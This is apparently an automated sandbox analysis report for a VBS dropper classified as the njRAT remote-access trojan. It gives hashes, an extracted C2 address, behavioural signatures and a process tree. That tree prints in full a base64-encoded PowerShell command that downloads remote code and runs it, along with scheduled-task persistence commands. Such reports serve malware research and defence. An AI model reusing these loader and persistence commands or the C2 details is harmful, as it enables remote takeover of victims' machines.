Analysis

  • max time kernel
    144s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    21-12-2021 08:19

General

  • Target

    P48274Q89.vbs

  • Size

    872B

  • MD5

    028b34eb17d379cf3688e72225cd95da

  • SHA1

    851db5268715999fc8db2d6292096d19e3830d3b

  • SHA256

    29bd0ab3b7cb939a7def1c4e4bb78c3c9d7e19d580e6292b155e89b13820309f

  • SHA512

    8e1be3d7de63e20e5d8737486b123dff598894bab17f15e69e2ac0f648e4d52b81e261aff26657fc4533ed20845d921e8aec1df2333fe8eeb1ab6d0763975405

Score
10/10

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

HacKed

C2

sxeodus12.duckdns.org:5552

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\P48274Q89.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3800
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c FOR /F "tokens=11 delims=s\" %g IN ('set^|findstr PSM') do %g -e JAB3AGUAYgByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AagB1AHMAdABpAGMAZQBtAG8AdQBuAHQALgB4AHkAegAvAHMAZQBlAC8AUABlAC0AQwBvAGQAZQAuAHQAeAB0ACcAKQA7ACQAcgBlAHMAcAA9ACQAdwBlAGIAcgBlAHEALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJAByAGUAcwBwAHMAdAByAGUAYQBtAD0AJAByAGUAcwBwAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAcgBlAGEAZABlAHIAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHIAZQBzAHAAcwB0AHIAZQBhAG0AKQA7ACQAYwBvAG4AdABlAG4AdAA9ACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAkAGMAbwBuAHQAZQBuAHQAIAB8ACAAaQBlAHgA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c set|findstr PSM
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1120
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set"
          4⤵
            PID:1240
          • C:\Windows\system32\findstr.exe
            findstr PSM
            4⤵
              PID:1352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -e JAB3AGUAYgByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AagB1AHMAdABpAGMAZQBtAG8AdQBuAHQALgB4AHkAegAvAHMAZQBlAC8AUABlAC0AQwBvAGQAZQAuAHQAeAB0ACcAKQA7ACQAcgBlAHMAcAA9ACQAdwBlAGIAcgBlAHEALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJAByAGUAcwBwAHMAdAByAGUAYQBtAD0AJAByAGUAcwBwAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAcgBlAGEAZABlAHIAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHIAZQBzAHAAcwB0AHIAZQBhAG0AKQA7ACQAYwBvAG4AdABlAG4AdAA9ACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAkAGMAbwBuAHQAZQBuAHQAIAB8ACAAaQBlAHgA
            3⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1524
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3668
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • Drops startup file
                • Suspicious use of AdjustPrivilegeToken
                PID:2104
              • C:\Users\Admin\AppData\Local\Temp\win_media.exe
                "C:\Users\Admin\AppData\Local\Temp\win_media.exe"
                5⤵
                • Executes dropped EXE
                PID:1068
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\windowmedia"
                5⤵
                  PID:436
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe'" /f
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1440
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe'" /f
                    6⤵
                    • Creates scheduled task(s)
                    PID:1296
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /c copy "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "C:\Users\Admin\AppData\Roaming\windowmedia\windowmedia.exe"
                  5⤵
                    PID:952

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\win_media.exe

            MD5

            e1a187b7f7fda5bce6eb1e053ba15bc3

            SHA1

            9a5dbb4f6c3e1a01d6d2d25f620a3e3a66876a73

            SHA256

            89c31847f4c22cfe3e8098d3ae2875f474929e3bf1fcb2bf7c9e90713719cd82

            SHA512

            42024a781cf74d066671d365c1a27ed15716d74dd51e3511e2dd62a6dd2aa2ec2cdc42d48f731f379037ab7338a3df28c3cbfdd7b2f11f5c2cd3b1edc1a895f6

          • C:\Users\Admin\AppData\Local\Temp\win_media.exe

            MD5

            e1a187b7f7fda5bce6eb1e053ba15bc3

            SHA1

            9a5dbb4f6c3e1a01d6d2d25f620a3e3a66876a73

            SHA256

            89c31847f4c22cfe3e8098d3ae2875f474929e3bf1fcb2bf7c9e90713719cd82

            SHA512

            42024a781cf74d066671d365c1a27ed15716d74dd51e3511e2dd62a6dd2aa2ec2cdc42d48f731f379037ab7338a3df28c3cbfdd7b2f11f5c2cd3b1edc1a895f6

          • memory/436-162-0x0000000000000000-mapping.dmp

          • memory/612-115-0x0000000000000000-mapping.dmp

          • memory/952-164-0x0000000000000000-mapping.dmp

          • memory/1068-167-0x0000000000712000-0x0000000000714000-memory.dmp

            Filesize

            8KB

          • memory/1068-166-0x0000000000710000-0x0000000000712000-memory.dmp

            Filesize

            8KB

          • memory/1068-159-0x0000000000000000-mapping.dmp

          • memory/1120-116-0x0000000000000000-mapping.dmp

          • memory/1240-117-0x0000000000000000-mapping.dmp

          • memory/1296-165-0x0000000000000000-mapping.dmp

          • memory/1352-118-0x0000000000000000-mapping.dmp

          • memory/1440-163-0x0000000000000000-mapping.dmp

          • memory/1524-142-0x00000224C2D90000-0x00000224C2D9C000-memory.dmp

            Filesize

            48KB

          • memory/1524-119-0x0000000000000000-mapping.dmp

          • memory/1524-131-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-130-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-132-0x00000224DD030000-0x00000224DD031000-memory.dmp

            Filesize

            4KB

          • memory/1524-133-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-135-0x00000224DAF56000-0x00000224DAF58000-memory.dmp

            Filesize

            8KB

          • memory/1524-128-0x00000224DAF53000-0x00000224DAF55000-memory.dmp

            Filesize

            8KB

          • memory/1524-126-0x00000224DAF50000-0x00000224DAF52000-memory.dmp

            Filesize

            8KB

          • memory/1524-127-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-145-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-125-0x00000224C2850000-0x00000224C2851000-memory.dmp

            Filesize

            4KB

          • memory/1524-120-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-121-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-122-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-123-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-124-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/1524-129-0x00000224C26F0000-0x00000224C26F2000-memory.dmp

            Filesize

            8KB

          • memory/2104-154-0x000000000040837E-mapping.dmp

          • memory/2104-157-0x0000000005700000-0x0000000005701000-memory.dmp

            Filesize

            4KB

          • memory/2104-153-0x0000000000400000-0x000000000040E000-memory.dmp

            Filesize

            56KB

          • memory/2104-168-0x0000000005DD0000-0x0000000005DD1000-memory.dmp

            Filesize

            4KB

          • memory/3668-143-0x0000000000400000-0x0000000000472000-memory.dmp

            Filesize

            456KB

          • memory/3668-152-0x0000000004F70000-0x0000000004F71000-memory.dmp

            Filesize

            4KB

          • memory/3668-151-0x00000000050A0000-0x00000000050A1000-memory.dmp

            Filesize

            4KB

          • memory/3668-150-0x00000000050E0000-0x00000000050E1000-memory.dmp

            Filesize

            4KB

          • memory/3668-149-0x0000000005540000-0x0000000005541000-memory.dmp

            Filesize

            4KB

          • memory/3668-148-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

            Filesize

            4KB

          • memory/3668-146-0x0000000000400000-0x0000000000472000-memory.dmp

            Filesize

            456KB

          • memory/3668-144-0x000000000044C20E-mapping.dmp